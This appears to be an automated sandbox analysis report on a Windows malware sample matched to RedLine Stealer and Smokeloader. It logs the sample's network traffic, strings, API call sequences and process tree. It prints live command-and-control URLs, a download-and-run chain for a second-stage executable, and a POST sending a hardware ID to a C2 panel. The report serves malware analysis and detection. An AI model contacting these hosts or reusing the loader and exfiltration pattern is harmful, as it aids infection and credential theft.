c0 2e 72 73 72 63 00 00 00 c8 1c 01 00 00 f0 40 00 00 1e 01 00 00 82 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--
                    Source: Joe Sandbox ViewIP Address: 104.21.56.70 104.21.56.70
                    Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
                    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 176.113.115.19:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 104.21.56.70:443
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004029F4 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029F4
                    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 92.255.57.89Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
                    Source: unknownHTTP traffic detected: POST /45c616e921a794b8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 92.255.57.89Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 30 44 41 38 38 32 30 43 34 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 43 2d 2d 0d 0a Data Ascii: ------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="hwid"C0DA8820C40F807656615------DGIJECGDGCBKECAKFBGCContent-Disposition: form-data; name="build"default------DGIJECGDGCBKECAKFBGC--
                    Source: ief722WreR.exe, ief722WreR.exe, 00000000.00000003.3546343202.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000003.1296872109.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3676687673.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
                    Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5rjtejk5rytrrSOFTWARE
                    Source: ief722WreR.exe, 00000000.00000002.3677983339.0000000003200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exeM
                    Source: ief722WreR.exe, 00000000.00000003.1296872109.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exexr
                    Source: DADE.tmp.exe, 00000008.00000002.1934043928.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/2b
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.php
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpE
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpQ
                    Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/45c616e921a794b8.phpwininit.exe
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmp, DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dll
                    Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllexe
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000ACD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dlll
                    Source: DADE.tmp.exe, 00000008.00000002.1934122632.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://92.255.57.89/697b92cb4e247842/sqlite3.dllll
                    Source: DADE.tmp.exe, 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89AKFBGC
                    Source: DADE.tmp.exe, 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: http://92.255.57.89smss.exe
                    Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                    Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: ief722WreR.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: ief722WreR.exe, 00000000.00000002.3676289540.0000000000B6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.7:49699 version: TLS 1.2
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_02481942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_02481942
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_004097A0 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,8_2_004097A0

                    System Summary

                    barindex
                    Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_02482361 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_02482361
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_02482605 NtdllDefWindowProc_W,PostQuitMessage,0_2_02482605
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004280220_2_00428022
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004071AB0_2_004071AB
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004373D90_2_004373D9
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0042D4EE0_2_0042D4EE
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004274840_2_00427484
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004285600_2_00428560
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0043D6780_2_0043D678
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004166AF0_2_004166AF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004137250_2_00413725
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_004277F60_2_004277F6
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0040E9740_2_0040E974
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0042EAE00_2_0042EAE0
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00427AA00_2_00427AA0
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00418AAF0_2_00418AAF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00436CBF0_2_00436CBF
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00427D670_2_00427D67
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00413F0B0_2_00413F0B
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00B040B70_2_00B040B7
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A82890_2_024A8289
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024AED470_2_024AED47
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024941720_2_02494172
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A76EB0_2_024A76EB
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024AD7550_2_024AD755
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A87C70_2_024A87C7
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A7A5D0_2_024A7A5D
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0248EBDB0_2_0248EBDB
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024969160_2_02496916
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_0249398C0_2_0249398C
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024B6F260_2_024B6F26
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A7FCE0_2_024A7FCE
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024AED470_2_024AED47
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_024A7D070_2_024A7D07
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_02498D160_2_02498D16
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009F4B378_2_009F4B37
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: String function: 00404980 appears 317 times
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: String function: 00410720 appears 53 times
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: String function: 02490987 appears 53 times
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: String function: 0040F903 appears 36 times
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: String function: 0040FDB2 appears 125 times
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: String function: 02490019 appears 121 times
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096
                    Source: ief722WreR.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: DADE.tmp.exe.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: ief722WreR.exeBinary or memory string: OriginalFileName vs ief722WreR.exe
                    Source: ief722WreR.exe, 00000000.00000003.1241468211.00000000024F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe
                    Source: ief722WreR.exe, 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe
                    Source: ief722WreR.exe, 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs ief722WreR.exe
                    Source: ief722WreR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000008.00000002.1934099181.0000000000A58000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: ief722WreR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DADE.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\ief722WreR.exeCode function: 0_2_00AF9C8E CreateToolhelp32Snapshot,Module32First,0_2_00AF9C8E
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeCode function: 8_2_009ECE47 CoCreateInstance,MultiByteToWideChar,lstrcpyn,8_2_009ECE47
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\track_prt[1].htmJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeMutant created: \Sessions\1\BaseNamedObjects\5rjtejk5rytrr
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess564
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile created: C:\Users\user~1\AppData\Local\Temp\DADE.tmpJump to behavior
                    Source: ief722WreR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\ief722WreR.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: ief722WreR.exeReversingLabs: Detection: 44%
                    Source: unknownProcess created: C:\Users\user\Desktop\ief722WreR.exe "C:\Users\user\Desktop\ief722WreR.exe"
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\DADE.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 564 -s 1096
                    Source: C:\Users\user\Desktop\ief722WreR.exeProcess created: C:\Users\user\AppData\Local\Temp\DADE.tmp.exe "C:\Users\user~1\AppData\Local\Temp\DADE.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\ief722WreR.exeSection loaded: msasn1.dllJump to behavior
